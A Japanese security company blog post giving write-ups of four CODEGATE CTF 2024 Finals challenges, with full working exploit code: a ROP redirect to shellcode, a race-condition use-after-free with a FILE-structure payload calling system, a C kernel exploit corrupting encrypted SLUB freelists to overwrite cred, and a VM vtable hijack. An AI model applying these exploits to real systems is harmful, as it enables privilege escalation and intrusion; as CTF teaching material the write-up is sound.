Tuesday, December 17, 2024

CODEGATE CTF 2024決勝のWriteup

 著者:ptr-yudai

はじめに

今回のブログ記事では、今年の8月29日と30日に開催されたCODEGATE CTF 2024 Finalsで取り組んだ問題の解説を公開します。 CODEGATEは韓国で最も大きいサイバーセキュリティイベントの1つで、カンファレンスの他にCTFの決勝大会も平行して開催されます。今年の決勝大会にはチームBunkyoWesternsのメンバーとして弊社からarataptr-yudaiの2名が出場しました。1チーム4人までで、我々の他にはchocoruskさんとst98さんが参加してくださいました。

 

例年どおりソウルのCOEX MALLで開催されたCODEGATE CTF

厳しい予選大会を突破した世界20チームのうち、我々BunkyoWesternsは7位の成績を収めました。私はpwn(Binary Exploitation)担当として予選・本戦とも参加しました。 CODEGATEのpwnは例年バイナリのみの配布で、exploitよりも解析パートがメインの問題が多い傾向があります。24時間ずっと会場で取り組み続ける必要があるため、忍耐力が要求されるCTFの1つです。

本大会で私はMisc問題1つとPwn問題3つのフラグを通したので、それらの問題概要と解き方について解説していきます。

 

[misc] super jumper

問題概要

Miscに分類されていましたが、x86-64の問題だったため担当しました。 このプログラムでは、まず任意のELFファイルをある程度自由なファイル名で一時フォルダに作成し、起動することができます。

 

IDAでデコンパイルして変数名をつけたコード

ただし、作成したプログラムはptraceによって停止状態で起動し、そのメモリマップが表示されます。さらに、親プロセス側からどのアドレスを開始位置として実行するかを指定できます。

したがって、任意のコードを実行できそうに見えますが次のチェックがあります。

 

メモリマップを確認するコード
 

 メモリマップのファイル名に”tmp”という文字が含まれている場合は”Invalid address”と表示して実行してくれません。つまり、自由なELFプログラムを起動して、ヒープやスタック等の領域をエントリポイントとして実行できる、という問題設定です。

想定解

私はこの問題を運営の想定解とは異なる方法で解いていたのですが、想定解についても簡単に説明しておきます。 想定解では、ファイル名を自由に決められるという問題設定を利用します。ファイル名は一般的にargv[0]としてプログラムに渡されるので、スタック上に存在します。つまり、スタックが実行可能な(NXが無効な)ELFファイルを作り、ファイル名をシェルコードにしておくことで、スタックの適当な位置を実行するとシェルコードが動きます。

非想定解

libcやld中の機械語に飛ばすことはできるため、今回はlibcのgadgetを使って実行ファイル本体にリダイレクトさせる方針にしました。

0x1a44ed: lea edx,  [0x00000000001A4900] ; add rdx, r8 ; jmp rdx ; (1 found)

このgadgetを使うと、0x1a4900 + r8にジャンプしてくれます。r8レジスタの値は固定だったため、このジャンプ先に機械語がロードされるように実行ファイルをビルドすれば良いです。

section .text
global _start

_start:
  times 0x1000 nop
  xor edx, edx
  push rdx
  lea rdi, [rel arg2]
  push rdi
  lea rdi, [rel arg1]
  push rdi
  lea rdi, [rel arg0]
  push rdi
  mov rsi, rsp
  mov eax, 59
  syscall

  mov eax, 60
  syscall

section .data
arg0: db "/bin/sh", 0
arg1: db "-c", 0
arg2: db "cat /flag", 0
from ptrlib import *

# 0x1a44ed: lea edx,  [0x00000000001A4900] ; add rdx, r8 ; jmp rdx ; (1 found)
if os.system("nasm pwn.S -fELF64") != 0: exit(1)
if os.system("ld pwn.o -o pwn -Ttext 0xae417000 -lc -dynamic-linker /usr/lib/x86_64-linux-gnu/libc.so.6") != 0: exit(1)

elf = open("pwn", "rb").read()

sock = Socket("localhost", 9000)

sock.sendlineafter("filesize > ", len(elf))
sock.sendafter("elf > ", elf)
sock.sendlineafter("elfname > ", "neko")

libc_base = int(sock.recvregex("([0-9a-f]+).+libc.so.6")[0], 16)
sock.sendlineafter("? ", hex(libc_base + 0x1a44ed))

sock.sh()

ほとんどのチームが解けた簡単な問題ですが、意外と時間をかけてしまいました。このような恣意的な設定の問題が苦手なところもあるので、もっと早く解けるように頭を柔らかくしていきたいです。

 

[pwn] Flight

問題概要

この問題ではx86-64でstripされたELFファイルが渡されます。IDAで解析すると、プログラムはC++製であり、主に9つの機能を持つプログラムであることがわかります。

プログラムが起動すると、データ構造を管理するサブスレッドとコマンドを受け付けるメインスレッドの2つに分岐します。いくつかのコマンドは共有メモリを介してサブスレッドにコマンドを実行させます。

解析

プログラムは入力された4バイトの数値をもとに、switch文で9つの機能に分岐するという構造でした。そこで、まずは各機能が何をするかを解析しました。この問題のようにすべてのシンボルが削除されており構造も複雑なプログラムでは、私は意味を無視して表層的に入出力だけを処理するコードから書き始めるようにしています。

いくつかのコマンドはreadで入力を受け付けていたため、その部分だけ送信するコードを書きました。

 

初めは何の機能が実装されているかまったくわからない

動的解析と組み合わせて読み進めると、辞書(map)と思われる構造を使ってデータを管理していることがわかりました。送信したデータのいくつかは検証されていたため、辞書構造の操作からそれらの値の意味を考えると、各機能の役割が少しずつ明らかになりました。

 

解析が少し進んだ後のwrapperコード

例えば、3つめの機能には以下のようなコードがあります。

 

メインスレッド側の3つめの機能のコードの一部

このコードは入力した値に応じて次の入力構造が変化するため、最初の入力は型情報であると推測できます。このような具合に変数の役割を次々に特定していきます。また、同時にプログラムの動作に関しても、共有メモリを経由してデータを送信・同期している、といった挙動も明らかになっていきました。

最終的に、以下のような9つの機能(と終了コマンド)が実装されていることがわかりました。

 

最終的なwrapperのコード

各機能を簡潔に説明すると、以下のようになります。

  • add: メインスレッドの辞書に空のValueを1つ登録する。
  • delete: メインスレッドの辞書から特定のキーのValueを削除する。
  • remote_add: メインスレッドの辞書に登録されているValueすべてに、型情報とデータ本体を与えながらサブスレッドに送信する。サブスレッド側では辞書に追加される。
  • showall: メインスレッドの辞書に登録されているValueをすべて表示する
  • remote_show: サブスレッドの辞書に登録されているValueを1つ表示する
  • nop: 何もしない。
  • remote_setmsg: サブスレッドの辞書に登録されている特定のValueにバイト列を紐付ける。

Valueは1つのデータ領域を持ち、共有メモリを使うかどうかを指定できます。 各機能はメインスレッド側からリクエストを発出できます。リクエストは最大10個までが入る配列に記録され、サブスレッド側で適宜処理されます。

 

サブスレッド側でのコマンド処理

脆弱性

アドレスリークは比較的簡単です。 remote_addなどでデータを設定する際、データ領域をmallocで確保しているにも関わらずread関数の戻り値が0以下であるかのみを確認しているため、未初期化の領域が残っている可能性があります。適当なチャンクをsmallbinにつなげて、そこからmallocすることでmain_arena中のアドレスを読むことができます。

では、メモリ破壊につながる脆弱性はあるでしょうか。 今回のプログラムはマルチスレッドであるという点と、共有メモリを使う特徴的な機能があるという点が怪しいので、そのあたりを重点的に読むことにしました。次のコードはremote_addで共有メモリを使うValueを送信する際のコードの一部です。

 

共有メモリを使う機能のコードの一部

ここで、共有バッファは参照カウンタを使って実装されています。(すべてのシンボルがstripされているので実際には各関数の処理も追う必要がありました。)しかし、この処理周辺には何のロック処理もありません。 処理リクエストを発出するのはメインスレッド単体のため、順番にリクエストが処理されればこれは何の問題もないように思えます。 しかし、サブスレッド側はリクエストの配列を順にチェックし続けるだけなので、メインスレッドが作ったリクエストは必ずしも順番どおりに処理されるとは限りません。

したがって、共有バッファを作ってから参照カウンタがインクリメントされるまでの間に削除要求を出すことで、共有バッファの構造体に対するUse-after-Freeが発生します。この構造体はデータ実体へのポインタを持っているため、任意アドレス書き込みが実現します。

例えば以下の図では5個の共有バッファの登録と、それらの削除のリクエストをほぼ同時に送信しています。

 

Race Conditionが発生する例

サブスレッドがリクエストを1回目に処理するタイミングでは3つしか登録されていませんが、2回目に処理するタイミングでは残りの2つとすべての削除要求が到達しています。これにより、参照カウンタが増加するよりも先に削除が発生するため、Use-after-Freeが起こります。

成功確率を上げるため、実際には同じIDに対する削除リクエストを10回ずつ送信しました。

from ptrlib import *
import time

def add():
    sock.send(p32(0))

def delete(index):
    sock.send(p32(1))
    sock.send(p64(index))

def remote_add(data):
    assert 0 <= len(data) <= 9
    sock.send(p32(2))
    sock.send(p32(len(data)))
    for element in data:
        sock.send(p64(element[0]) + p64(element[1])) # type, index
        if element[0] == 0:
            buf = element[2]
            size = element[3]
            sock.send(p32(size))
            sock.send(buf)

def showall():
    sock.send(p32(3))

def remote_showall():
    sock.send(p32(4)) # 0xD3260001

def show(index):
    sock.send(p32(5))
    sock.send(p64(index))

def remote_show(index):
    sock.send(p32(6)) # 0xD3260002
    sock.send(p64(index))

def nop():
    sock.send(p32(7))

def remote_setmsg(index, data, size):
    sock.send(p32(8)) # 0xD3260003
    sock.send(p64(index))
    sock.send(p32(size))
    sock.send(data)

def terminate():
    sock.send(p32(9))

libc = ELF("libc.so.6")
#sock = Process("./Challenge")
sock = Socket("localhost", 9000)
sock.recvline()

# Leak libc
for _ in range(10):
    add()

remote_add([(1, 0)])
sock.recvline()

remote_add([(0, 0, b"A"*0x428, 0x428)])
sock.recvline()

remote_add([(0, 0, b"B"*0x18, 0x18)])
sock.recvline()

remote_add([(0, 0, b"A"*8, 0x3f8)])
sock.recvline()

show(0)
libc.base = u64(sock.recvlineafter("AAAAAAAA")) - libc.main_arena() - 0x450

# Race condition
remote_add([
    (1, i) for i in range(1, 10)
])
for _ in range(10):
    for i in range(1, 10):
        delete(i)

for _ in range(9):
    sock.recvline()

remote_setmsg(0, b"Y"*8 + b"X"*8 + p64(libc.base), 0x20)
sock.recvline()

payload  = p32(0xfbad0101) + b";sh\0" # fp->_flags & _IO_UNBUFFERED == 0)
payload += b"\x00" * (0x18 - len(payload))
payload += p64(libc.symbol('_IO_2_1_stdout_'))
payload += b"\x00" * (0x58 - len(payload))
payload += p64(libc.symbol("system")) # vtable->iowalloc
payload += b"\x00" * (0x88 - len(payload))
payload += p64(libc.symbol("_IO_2_1_stdout_") - 0x10) # _wide_data (1)
payload += b"\x00" * (0xa0 - len(payload))
payload += p64(libc.symbol("_IO_2_1_stdout_") - 0x10) # _wide_data (1)
payload += b"\x00" * (0xc0 - len(payload))
payload += p32(0) # fp->_mode == 0
payload += b"\x00" * (0xd0 - len(payload))
payload += p64(libc.symbol("_IO_2_1_stdout_") - 0x10) # (1) _wide_data->vtable
payload += p64(libc.symbol("_IO_wfile_jumps") + 0x18 - 0x38) # _IO_wfile_jumps +
remote_setmsg(8, payload, 0xe0)
sock.recvline()

sock.sh()

この問題はpwnの中では最も解かれており、最終的には半数弱のチームが解いていたと思います。難しかったですが、多くのチームが解いている問題を落とさず解けて安心しました。

[pwn] tiny_msg

問題概要

この問題ではx86-64のカーネルイメージとファイルシステム、そしてqemuの起動コマンドが渡されます。 典型的なカーネルexploit問で、tiny_msg.koという名前のカーネルモジュールがロードされているので、このモジュールの脆弱性を悪用して権限昇格する必要があります。

解析

モジュールはいたって単純で、ioctl経由でcreate, read, write, deleteの4つの操作をユーザー空間から依頼できます。

  • create: サイズ0x200の領域をヒープから確保し、ユーザー空間からデータをコピーして双方向リストに繋げる
  • read: 指定したIDのデータをリストから探し、ユーザー空間にデータをコピーする
  • write: 指定したIDのデータをリストから探し、ユーザー空間からデータをコピーする
  • delete: 指定したIDのデータをリストから探し、解放してunlinkする

サイズ0x200の領域は次のような構造体として扱われます。

__attribute__((packed))
struct {
  note_t *next;
  note_t *prev;
  uint16_t id;
  uint8_t data[];
} tiny_msg_t;

dataには最大0x1e8バイトを読み書きすることができます。

今回の問題で特徴的なのは、kmallocではなくkmem_cache_allocを使って専用のkmem_cacheから確保しているという点です。 このキャッシュはカーネルモジュールがロードされたときにmsg_cacheという名前で作られます。さらに、他のキャッシュとマージされないようにslab_nomergeが起動オプションに付加されています。

脆弱性

モジュール自体がシンプルなので、この問題では脆弱性はすぐ見つかりました。以下はcreateでメッセージ構造体を登録する部分のデコンパイル結果になります。

 

メッセージを新規作成するioctlの処理

52行目はcopy_from_userでデータのコピーが失敗した際に通るパスですが、このパスを通るとkmem_cache_freeが呼ばれて終了します。しかし、双方向リストには繋がったままであるため、後にread, write, delete操作を使うことができそうです。 したがって、Use-after-Free脆弱性があります。

解法

この問題で難しいのは完全な専用キャッシュが使われており、他の構造体とoverlapすることがないという点です。カーネルexploitを普段やっている人であればまずcross-cache attackを思いつくかもしれませんが、今回のモジュールには実は次のチェックがあります。

 

メッセージの個数チェック

なんと0x200個以上のメッセージ構造体を作ることができません。 sysfsをマウントして確認したところ、今回のカーネルではmsg_cacheは1つのslabに16個入り、かつpartialの個数が52個になっていました。したがって、少なく見積もっても0x340個より多くの構造体が確保できない限りcross-cache attackは実現不能です。

そこで今回は、解放されたチャンクに記載されるfreeptrを破壊することにしました。といっても決勝の問題はそこまで甘くはなく、CONFIG_SLUB_FREELIST_HARDENEDが有効なのでポインタはキャッシュごとに設定された乱数鍵を使って暗号化されています。

これでは攻撃できないでしょうか?

あるチャンクpがfreeされたとき(正確にはfreeptrが記載されるアドレスを$p$とする)、リンク先のアドレス$p_{\mathrm{next}}$を使ってfreeptrは以下の式で暗号化されます。

$E(p_{\mathrm{next}}) = p_{\mathrm{next}} \oplus \mathrm{key} \oplus \mathrm{bswap}(p)$

ここでbswapはエンディアンを逆順にする関数で、一般に$p$と$p_{\mathrm{next}}$は近い値を取るためXORで打ち消されないようにbswap処理が使われています。

さて、今回は$p, p_{\mathrm{next}}, \mathrm{key}$のいずれもわかりませんが、その結果だけは読み書き可能な状態にあります。もし結果の下位1バイトに0x80をXORした値を書き込むとどうなるでしょうか。ポインタを復号する際、

$E^{-1}(p_{\mathrm{next}} \oplus \mathrm{key} \oplus \mathrm{bswap}(p) \oplus \mathrm{0x80}) = p_{\mathrm{next}} \oplus \mathrm{0x80}$

となり、freeptrをずらすことができます。 特に今回はチャンクサイズが0x200のため、$p_{\mathrm{next}}$の下位1バイトはかならず0x00です。したがって、暗号化されたポインタに0x80をXORすることで、必ず0x80バイト高いアドレスにfreeptrをずらすことができます。

この壊れたfreeptrが使われると、そのチャンクは隣接したチャンクに重なります。構造体の先頭にはnext, prevポインタがあるので、これを破壊することで任意アドレス読み書きが実現できそうです。

nextポインタを改ざんすると(IDに該当する箇所のデータが予測できる限り)任意のアドレスのデータを読めますが、リンクが壊れてしまいます。新しく作った構造体はリンクの先頭に追加されるため、このままでは任意アドレス読み書きを1度しか使えません。 そこで、今回はnextポインタ破壊用のデータもfailのパスに通してUAFさせることにより、何度でも任意アドレス読み書きを実現できるようにしました。

私のexploitの方針としては、IDTからカーネルのベースアドレスをリークし、自身のtask_structを見つけてcred構造体を書き換えています。

#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <errno.h>
#include <inttypes.h>
#include <limits.h>
#include <pthread.h>
#include <signal.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <poll.h>
#include <stdnoreturn.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/timerfd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/resource.h>
#include <sys/xattr.h>

#include "scripts/util.h"
#include "scripts/cred.h"
#include "scripts/io_uring.h"

#define MSG_CREATE 0x1310002
#define MSG_READ   0x1310003
#define MSG_WRITE  0x1310004
#define MSG_DELETE 0x1310005

typedef struct __attribute__((packed)) {
  unsigned long id;
  unsigned long size;
  unsigned char data[];
} req_t;

void set_cpu(int i)
{
  cpu_set_t mask;
  CPU_ZERO(&mask);
  CPU_SET(i, &mask);
  sched_setaffinity(0, sizeof(mask), &mask);
}

int create_msg(int fd, unsigned short id, unsigned char *data, size_t size) {
  int res;
  req_t *req = (req_t*)malloc(sizeof(req_t) + size);
  if (!req) fatal("create_msg: malloc");
  req->id = id;
  req->size = size;
  memcpy(req->data, data, size);
  res = ioctl(fd, MSG_CREATE, req);
  free(req);
  return res;
}

int create_msg_fail(int fd, unsigned short id,
                    unsigned char *data, size_t size) {
  void *mem = mmap((void*)0xdead000, 0x1000, PROT_READ|PROT_WRITE,
                   MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
  if (mem == MAP_FAILED) fatal("mmap");

  int res;
  req_t *req = mem + 0x1000 - sizeof(req_t) - size;
  req->id = id;
  req->size = 0x1E8;
  if (size)
    memcpy(req->data, data, size);
  res = ioctl(fd, MSG_CREATE, req);

  munmap(mem, 0x1000);
  return res;
}

int read_msg(int fd, unsigned short id, unsigned char *data, size_t size) {
  int res;
  req_t *req = (req_t*)malloc(sizeof(req_t) + size);
  if (!req) fatal("write_msg: malloc");
  req->id = id;
  req->size = size;
  res = ioctl(fd, MSG_READ, req);
  if (res == 0)
    memcpy(data, req->data, size);
  free(req);
  return res;
}

int write_msg(int fd, unsigned short id, unsigned char *data, size_t size) {
  int res;
  req_t *req = (req_t*)malloc(sizeof(req_t) + size);
  if (!req) fatal("write_msg: malloc");
  req->id = id;
  req->size = size;
  memcpy(req->data, data, size);
  res = ioctl(fd, MSG_WRITE, req);
  free(req);
  return res;
}

int delete_msg(int fd, unsigned short id) {
  req_t req = { .id = id, .size = 0 };
  return ioctl(fd, MSG_DELETE, &req);
}

#define SPRAY_BASE 0x10
#define SPRAY_N    0x10
#define EVIL_ID    0x100

int main(int argc, char **argv) {
  set_cpu(0);

  char base[0x200];
  char buf[0x200];
  memset(buf, 'A', 0x1E8);

  int fd = open("/dev/msgdev0", O_RDWR);
  if (fd == -1) fatal("/dev/msgdev0");

  /* Set all UAF */
  for (int i = SPRAY_BASE; i < SPRAY_BASE + SPRAY_N; i++) {
    assert (create_msg(fd, i, buf, 0x1e8) == 0);
  }
  for (int i = SPRAY_BASE; i < SPRAY_BASE + SPRAY_N; i++) {
    assert (delete_msg(fd, i) == 0);
    create_msg_fail(fd, i, NULL, 0); // UAF
  }

  size_t leaks[SPRAY_N];
  for (int i = SPRAY_BASE; i < SPRAY_BASE + SPRAY_N; i++) {
    assert (read_msg(fd, i, base, 0x1E8) == 0);
    leaks[i] = *(size_t*)(base + 6 + 0x100 - 0x18);
    printf("[+] leak = 0x%016lx\n", leaks[i]);
  }

  /* Corrupt link */
  *(size_t*)(base + 6 + 0x100 - 0x18) = leaks[SPRAY_BASE+SPRAY_N-1] ^ 0x180;
  assert (write_msg(fd, SPRAY_BASE+SPRAY_N-1, base, 0x1e8) == 0);

  // dummy chunk
  memset(buf, 'B', 0x1E8);
  assert (create_msg(fd, EVIL_ID-1, buf, 0x1E8) == 0);

  /* Leak kernel base */
  *(size_t*)(buf + 6 + 0x80 - 0x18) = 0xfffffe0000000008;
  *(size_t*)(buf + 6 + 0x80 - 0x10) = 0xfffffe0000000008;
  *(size_t*)(buf + 6 + 0x80 - 0x08) = 0xdead; // id
  create_msg_fail(fd, EVIL_ID, buf, 0x180);
  read_msg(fd, 0xffff, buf, 0x1E8);
  size_t kbase = *(size_t*)(buf + 6 + 4) - 0xc08e02;
  printf("[+] kbase = 0x%016lx\n", kbase);

  /* Leak task_struct */
  *(size_t*)(buf + 6 + 0x80 - 0x18) = kbase + 0x140add0;
  *(size_t*)(buf + 6 + 0x80 - 0x10) = kbase + 0x140add0;
  *(size_t*)(buf + 6 + 0x80 - 0x08) = 0xdead; // id
  create_msg_fail(fd, EVIL_ID, buf, 0x180);
  read_msg(fd, 0x0000, buf, 0x1E8);
  size_t task = *(size_t*)(buf + 6 + 0x10) - 0x470;
  printf("[+] task_struct = 0x%016lx\n", task);

  /* Leak cred */
  *(size_t*)(buf + 6 + 0x80 - 0x18) = task + 0x6f0;
  *(size_t*)(buf + 6 + 0x80 - 0x10) = task + 0x6f0;
  *(size_t*)(buf + 6 + 0x80 - 0x08) = 0xdead; // id
  create_msg_fail(fd, EVIL_ID, buf, 0x180);
  read_msg(fd, 0x0000, buf, 0x1E8);
  size_t cred = *(size_t*)(buf + 6 + 0x10);
  printf("[+] cred = 0x%016lx\n", cred);

  /* Overwrite cred */
  *(size_t*)(buf + 6 + 0x80 - 0x18) = cred - 0x20;
  *(size_t*)(buf + 6 + 0x80 - 0x10) = cred - 0x20;
  *(size_t*)(buf + 6 + 0x80 - 0x08) = 0xdead; // id
  create_msg_fail(fd, EVIL_ID, buf, 0x180);

  memset(buf, 0, 0x38);
  *(size_t*)buf = 0x3;
  write_msg(fd, 0x0000, buf, 0x38);

  puts("[+] Win!");
  system("cat /flag");

  return 0;
}

カーネルの暗号化freelistを悪用する攻撃はCTFで扱うのも初めてだったので勉強になりました。 ちなみに、この問題は社内勉強会でも題材として使わせていただきました。弊社では社内で有志の勉強会を開いているので、決勝で出るような難しい問題も勉強できる機会が提供されています 🤗

[pwn] Acquiesce

問題概要

この問題ではx86-64のプログラムが、またしてもstripされた状態で配布されました。こちらもFlightと同じくC++製で、定義されている関数はFlightよりも圧倒的に多いです。 プログラムは何かの入力を受け付けますが、適当に入力してもよくわからない出力が出てくるだけです。

 

謎の出力

解析

IDAで読んでみると、main関数は素直な実装でした。

 

main関数

少し解析したところ、独自のVMクラスがあり、バイトコードを入力してVMの初期化、実行、破棄を何度でも行えるインタプリタであることがわかりました。 しかし、VMの命令を実行する部分は次のように非常に複雑です。

 

とてもではないが読みたくない形をしているCFG

このような独自VMを解析する際、私は以下の3つを心がけています。

  • PC(プログラムカウンタ)を特定する
  • レジスタの構造を特定する
  • メモリの構造を特定する
  • 一般的な命令から順に特定する

PCの特定は比較的簡単です。多くのVMは命令コードを解釈するとswitch文で実装に分岐するため、switchで参照している変数から逆算するとPCが特定できます。今回のプログラムではsub_2C22が命令コードを返しているようです。命令内でも使われていることを考えると、現在PCが指しているバイトを取ってくる命令と推測できます。(ここではVM::FetchByteと名付けました。)

 

命令コードの比較箇所

この関数は以下のように定義されています。

 

VM::FetchByteの中身

this + 8の値をインクリメントしていることがわかります。したがって、ここがPCと考えて妥当でしょう。名前を付け直すと以下のようになります。

 

読みやすくなったVM::FetchByte

PC以外にも、レジスタやメモリがクラスメンバ中のどこにあるかを知ることでmovやstore系の命令を探しやすくなります。シンプルなインタプリタの場合はIDAのデコンパイル結果からすぐにレジスタやメモリの構造がわかるのですが、今回のプログラムは非常に複雑で、一見するとどこにレジスタやメモリが定義されているのかわかりませんでした。

そこでCTF中は、一般的に定義されている命令を探し、そこを起点に解析することにしました。例えば算術・論理演算は解析の起点として役に立ちます。これらの演算はデコンパイル結果にそのまま現れることが多いので、命令コードを特定しやすいです。 今回のVMでもこの特徴を利用できます。以下の図はそれぞれ命令コード0x14, 0x15, 0x16に出現するコードの一部です。

 


いくつかの命令コードで似たコードが見つかった

 

どれも構造が似通っていて、算出演算の部分のみが変わっていることがわかります。したがって、これらの命令はそれぞれADD, SUB, MULではないかと推測できます。

sub_5108はPCから4バイトの値を取ってくる関数のため、これがレジスタのインデクスあるいはメモリのオフセットのような値を持っていると考えられます。このように、わかりやすい命令を起点にVMの構造を解析していくこともできます。

解析を進めると、このVMにおける値はInteger, String, Functionのいずれかの型を持つことがわかりました。

 

新しく値を生成する命令

値は任意に指定できる4バイトのIDと紐付きます。つまり、このVMはメモリやレジスタは持たず、すべての変数をIDで管理しています。 さて、Function型の値の作成は以下のようになっています。関数は命令の位置と引数のリストで定義されます。

 

関数型変数の作成

 関数呼び出しは次のように定義されています。

 

call命令の実装

まず、変数のIDを受け取ってそれが関数型であることを検証しています。 次に、その関数の引数リストを走査し、このリストに記載されているIDの変数をコピーしています。 最後にPCをスタックにpushし、関数のアドレスにPCを変更します。

ここまでの解析で、このインタプリタに以下のような特徴があることがわかりました。

  • 関数型を定義できる
  • 関数は任意個数・任意型の引数を取る
  • 関数はスコープを持つ

脆弱性

callとretの実装を詳しく見ていきましょう。擬似的なコードを書くと次のようになります。

case VM_CALL:
    Value &func = vm->GetValueAt(vm->FetchDword());
    if (func.type() != TYPE_FUNCTION) Terminate();
    vm->args.emplace_back(func.getArgList());
    vm->values.push_back({});
    for (size_t i = 0; i < func.getArgSize(); i++) {
        uint32_t id = func.getArgList().at(i);
        Value &val = vm->GetValueAt(vm->FetchDword());
        vm->values.back().emplace_back(std::make_pair(id, val)); // [1]
    }
    vm->stack.push_back(vm->pc);
    vm->pc = func.getDestination();
    break;

case VM_RET:
    if (vm->stack.empty()) return 0;
    auto& cur = vm->values.back().begin();
    while (cur != vm->values.back().end()) {
        if (vm->args.back().find(*cur) == vm->args.back().end()) {
            Value &val = (*cur)->getValue();
            if (val) val->destroy();
            vm->values.back().erase(*cur);
        } else {
            cur = cur.next();
        }
    }
    vm->values.pop();
    vm->args.pop();
    vm->pc = *vm->stack.back();
    vm->stack.pop();
    break;

ここで、[1]で新しいスコープに引数の変数を作っています。このコードは単純に指定したIDに値を設定しているだけです。もし引数リストのうち複数に同じIDを指定すると、同じIDの変数が同じスコープに入ることになります。 一方で、新しく変数を作る箇所では以下のように、同じIDの変数があった場合には先に削除する処理が入っています。

 

すでに定義されているIDの変数を上書きするコード

したがって、関数呼び出しを使って同じスコープ内に複数の同一IDの変数を作ると、それを別の値で上書きした際に不整合が発生します。

 

スコープのバグ

これを使ってValue型のクラスのUse-after-Freeが引き起こせるため、vtableを破壊することで任意の関数ポインタが呼び出せます。

私のexploitでは単純なcall chainを使ってsystem("/bin/sh")を呼び出しました。

 

from ptrlib import *

labels = {}
funcs = {}
jmps = {}
code = b''

def new_int(index, value):
    return b'\x10' + p8(0xa0) + p32(index) + p32(value)
def new_str(index, data, size=None):
    if size is None:
        return b'\x10' + p8(0xa1) + p32(index) + p32(len(data)) + data
    else:
        return b'\x10' + p8(0xa1) + p32(index) + p32(size) + data
def new_func(index, name, data):
    if isinstance(name, int):
        addr = name
    else:
        addr = 0
        funcs[name] = len(code) + 6
    if len(data):
        return b'\x10' + p8(0xa2) + p32(index) + p32(addr) + p8(len(data)) \
            + flat(data, map=p32)
    else:
        return b'\x10' + p8(0xa2) + p32(index) + p32(addr) + p8(len(data))
def show(index):
    return b'\x11' + p32(index)
def call(index, args):
    if len(args):
        return b'\x12' + p32(index) + flat(args, p32)
    else:
        return b'\x12' + p32(index)
def ret():
    return b'\x13'
def add(i1, i2):
    return b'\x14' + p32(i1) + p32(i2)
def sub(i1, i2):
    return b'\x15' + p32(i1) + p32(i2)
def mul(i1, i2):
    return b'\x16' + p32(i1) + p32(i2)
def div(i1, i2):
    return b'\x17' + p32(i1) + p32(i2)
def mod(i1, i2):
    return b'\x18' + p32(i1) + p32(i2)
def jmp(name):
    jmps[name] = len(code) + 5
    return b'\x19' + p32(0)
def jnz(name):
    jmps[name] = len(code) + 5
    return b'\x1A' + p32(0)
def jz(name):
    jmps[name] = len(code) + 5
    return b'\x1B' + p32(0)
def is_equal(i1, i2):
    return b'\x1C' + p32(i1) + p32(i2)
def is_less(i1, i2):
    return b'\x1D' + p32(i1) + p32(i2)
def nop():
    return b'\x1E'
def hlt():
    return b'\x00'
def label(name):
    global labels
    labels[name] = len(code)
def resolve(code):
    for name in jmps:
        src = jmps[name]
        dst = labels[name]
        code = code[:src - 4] + p32(dst - src) + code[src:]
    for name in funcs:
        src = funcs[name]
        dst = labels[name]
        code = code[:src] + p32(dst) + code[src+4:]
    return code

libc = ELF("./libc.so.6")
sock = Socket("localhost", 3000)

sock.sendafter(">> ", ret())
leak = sock.recvonce(0x400)
libc.base = u64(leak[0x2d8:0x2e0]) - libc.symbol("sbrk") - 0xa4
canary = u64(leak[0x368:0x370])
stack = u64(leak[0x3d0:0x3d8]) - 0x150
logger.info("canary = " + hex(canary))
logger.info("stack = " + hex(stack))

""" Exploit """
code = b''
code += new_str(0, b"A"*0x10)
code += show(0)
code += new_func(1, "f", [0])
code += call(1, [0])
code += show(0)
code += ret()

label("f")
code += new_int(1, 0x1234)
code += new_func(2, "g", [0, 0])
code += call(2, [0, 1])
code += new_str(3, b"A"*0x10)
code += new_str(4, p64(stack) + p64(stack))
code += new_str(5, b"C"*0x10)
code += new_str(6, b"D"*0x10)
code += show(1)
code += ret()

label("g")
code += new_int(0, 0xcafe)
code += new_int(1, 0xdead)
code += ret()

code = resolve(code)
assert len(code) <= 0x400

# Prepare call chain (fake vtable)
# 0x0017b9b7: mov rax, [rdi+8]; call qword ptr [rax+0x48];
# 0x000a5678: mov rdi, [rax+8]; call qword ptr [rax];
code += b"X" * (0x3d0 - len(code) - 0x100 - 0x10)
code += p64(libc.symbol("system"))
code += p64(next(libc.find("/bin/sh")))
code += p64(libc.base + 0x0017b9b7) # 1
code += b"A" * 0x30
code += p64(libc.base + 0x000a5678)

sock.sendafter(">> ", code)
sock.recvonce(0x400)

sock.sh()

解説ではスコープのバグを簡潔に説明しましたが、実際には単純にIDをかぶせるだけではクラッシュしないため、バグに気づくのにとても時間がかかってしまいました。また、Flightも同じでしたが、複雑なプログラムでRaceやUAFを起こした後にRCEにつなげるのは結構骨の折れる作業なので、体力が削られました。 

スコアボードは現在見られませんが、FlightとAcquiesceは4,5 solvesだったと思います。この問題は睡眠不足で疲労していたこともあり一番時間を取られてしまいました。しかし、結果として解かないと上位には入れない程度のsolve数だったので、CODEGATEのレベルの高さを改めて実感しました。

おわりに

今回解説した問題以外にも暗号問の1つがpwnを交えたfault attackだったため手助けしていました。
CODEGATE CTFの決勝には2年前も参加しましたが、当時よりも1つ1つの問題が難しくなっていると感じました。CODEGATEのpwn問に関してはプログラムの規模が大きくなり、脆弱性を見つけるのがより難しくなっている印象です。 特に難しいCTFでは最先端の攻撃技術を問う問題が多く出題されるので、最新技術にキャッチアップする目的でも、今後もCTFに楽しく参加していければと思います。

CODEGATEで一緒に戦ってくれたチームの皆さん、ありがとうございました!

これからもリチェルカセキュリティでは、社員・アルバイトの方の自己研鑽のための諸経費を支援する予定です。新しい仲間も募集しているので、興味のある方はぜひお気軽にお問い合わせください。

Saturday, November 16, 2024

Mozilla Firefox 0-day: URLプロトコルハンドラの漏洩 [CVE-2024-9398, CVE-2024-5690]

 筆者:satoki

はじめに

はじめまして。リチェルカセキュリティのSatoki Tsujiです。業務ではWeb脆弱性診断やWebの新規攻撃手法の研究を行っています。

